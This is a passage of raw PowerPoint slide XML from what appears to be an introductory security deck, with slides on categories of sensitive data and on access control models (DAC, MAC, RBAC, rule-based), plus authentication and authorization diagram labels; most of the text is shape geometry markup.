            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Federal Agency Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attorney/Client Privileged Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36078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6EC8-DB91-430C-928A-3B83C725A3BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A48F925-75F9-4A26-B92D-29FF18D216C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="4230076" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grants or denies requests to access a particular resource or functionality after having successfully authenticated (logged in) to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implemented through various approaches:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discretionary Access Control (DAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mandatory Access Control (MAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Role-Based Access Control (RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule-Based Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D131A933-C1C5-4538-BF4D-014D23031F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3DB4FD4-995C-4454-A30F-3240F6E4A1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048500" y="2393178"/>
            <a:ext cx="2096319" cy="2235092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C7CA71-D0DC-4A4C-87CF-CEF19CB371BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5287920" y="1759001"/>
            <a:ext cx="2261432" cy="859399"/>
            <a:chOff x="5287920" y="1108898"/>
            <a:chExt cx="2261432" cy="859399"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D893CE1F-F017-498B-9EA6-7AFC3522E75B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5287920" y="1108898"/>
              <a:ext cx="1875504" cy="859399"/>
              <a:chOff x="4724400" y="3539159"/>
              <a:chExt cx="1875504" cy="859399"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Rounded Rectangle 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512B57D2-CF65-4D8F-A86E-AE2C80F776E6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5228304" y="3539159"/>
                <a:ext cx="1371600" cy="23567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Authorization</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Picture 6" descr="Image result for key png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3599D33B-E1C5-4F57-AE04-EE9EC5E4FE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80"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm rot="5400000">
                <a:off x="5163964" y="3299787"/>
                <a:ext cx="659207" cy="153833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E2868061-7E0D-4F56-92EB-957C4FF65E62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5821321" y="1323939"/>
              <a:ext cx="1728031" cy="253916"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Access to various “rooms”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B0CD8A-C864-4B56-8F3C-949FE9585E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4730750" y="3057317"/>
            <a:ext cx="2478332" cy="1058463"/>
            <a:chOff x="5294068" y="2747073"/>
            <a:chExt cx="2478332" cy="1058463"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0AD7C3B-9406-4AC6-AF9D-BF70AB33D5B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5294068" y="2747073"/>
              <a:ext cx="1945355" cy="1058463"/>
              <a:chOff x="4654549" y="1944629"/>
              <a:chExt cx="1945355" cy="1058463"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Rounded Rectangle 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575197BA-8CB8-4274-A04F-2522F72304F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5228304" y="1944629"/>
                <a:ext cx="1371600" cy="23567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Authentication</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Picture 6" descr="Image result for key png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628191CA-BCA4-4F21-9333-5E687172C4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rot="5400000">
                <a:off x="5005329" y="1815536"/>
                <a:ext cx="836776" cy="15383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B0B40917-A389-4E5E-9AC0-2B0E2F3C359A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5817423" y="2963832"/>
              <a:ext cx="1954977" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Access to application “front door”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform: Shape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11CDB9A7-5530-43CF-91DB-2B615985CD4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7382448" y="2160138"/>
            <a:ext cx="828352" cy="438166"/>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904568"/>
              <a:gd name="connsiteY0" fmla="*/ 27693 h 578299"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 87309 h 578299"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37705 h 588311"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 97321 h 588311"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 587835"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 587835"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 630910"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 630910"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 630910"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY3" fmla="*/ 611574 h 630910"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1113433"/>
              <a:gd name="connsiteY0" fmla="*/ 20150 h 594495"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1113433"/>
              <a:gd name="connsiteY1" fmla="*/ 80952 h 594495"/>
              <a:gd name="connsiteX2" fmla="*/ 1103645 w 1113433"/>
              <a:gd name="connsiteY2" fmla="*/ 362390 h 594495"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1113433"/>
              <a:gd name="connsiteY3" fmla="*/ 594495 h 594495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 28338 h 602683"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 89140 h 602683"/>
              <a:gd name="connsiteX2" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 602683 h 602683"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1081569"/>
              <a:gd name="connsiteY0" fmla="*/ 22376 h 438166"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1081569"/>
              <a:gd name="connsiteY1" fmla="*/ 83178 h 438166"/>
              <a:gd name="connsiteX2" fmla="*/ 1081570 w 1081569"/>
              <a:gd name="connsiteY2" fmla="*/ 438166 h 438166"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1081569" h="438166">
                <a:moveTo>
                  <a:pt x="0" y="22376"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="258916" y="-28425"/>
                  <a:pt x="532651" y="13880"/>
                  <a:pt x="712913" y="83178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893175" y="152476"/>
                  <a:pt x="1016955" y="331178"/>
                  <a:pt x="1081570" y="438166"/>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17" name="Freeform: Shape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CABD246A-ECCB-4AC6-B8C3-0D0350BDDFA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7363984" y="2158395"/>
            <a:ext cx="1526083" cy="641568"/>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680072"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 627318"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1680072"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 627318"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1680072"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 627318"/>
              <a:gd name="connsiteX3" fmla="*/ 1680072 w 1680072"/>
              <a:gd name="connsiteY3" fmla="*/ 460783 h 627318"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 671908"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 671908"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 671908"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 622829 h 671908"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 27986 h 593945"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 18153 h 593945"/>
              <a:gd name="connsiteX2" fmla="*/ 1367556 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 80880 h 593945"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 590167 h 593945"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 61480 h 623661"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 51647 h 623661"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 623661 h 623661"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 29192 h 591373"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 19359 h 591373"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 591373 h 591373"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60040 h 622221"/>
              <a:gd name="connsiteX1" fmla="*/ 691744 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 3908 h 622221"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 622221 h 622221"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81596 h 643777"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2315 h 643777"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643777 h 643777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81737 h 643918"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2456 h 643918"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643918 h 643918"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1992588" h="641568">
                <a:moveTo>
                  <a:pt x="0" y="79387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115159" y="63514"/>
                  <a:pt x="180938" y="8781"/>
                  <a:pt x="668594" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1156250" y="-8569"/>
                  <a:pt x="1716756" y="522399"/>
                  <a:pt x="1992588" y="641568"/>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19" name="Freeform: Shape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8913F9-5E52-4B6C-BA73-4ED45CA19E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21218058">
            <a:off x="2139394" y="1315976"/>
            <a:ext cx="3121589" cy="696574"/>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680072"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 627318"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1680072"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 627318"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1680072"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 627318"/>
              <a:gd name="connsiteX3" fmla="*/ 1680072 w 1680072"/>
              <a:gd name="connsiteY3" fmla="*/ 460783 h 627318"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 671908"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 671908"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 671908"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 622829 h 671908"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 27986 h 593945"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 18153 h 593945"/>
              <a:gd name="connsiteX2" fmla="*/ 1367556 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 80880 h 593945"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 590167 h 593945"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 61480 h 623661"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 51647 h 623661"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 623661 h 623661"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 29192 h 591373"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 19359 h 591373"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 591373 h 591373"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60040 h 622221"/>
              <a:gd name="connsiteX1" fmla="*/ 691744 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 3908 h 622221"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 622221 h 622221"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81596 h 643777"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2315 h 643777"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643777 h 643777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81737 h 643918"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2456 h 643918"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643918 h 643918"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 1537 h 563718"/>
              <a:gd name="connsiteX1" fmla="*/ 933614 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 89493 h 563718"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 563718 h 563718"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 1537 h 563718"/>
              <a:gd name="connsiteX1" fmla="*/ 933614 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 89493 h 563718"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 563718 h 563718"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 2004 h 564185"/>
              <a:gd name="connsiteX1" fmla="*/ 930622 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 61315 h 564185"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 564185 h 564185"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 7664 h 569845"/>
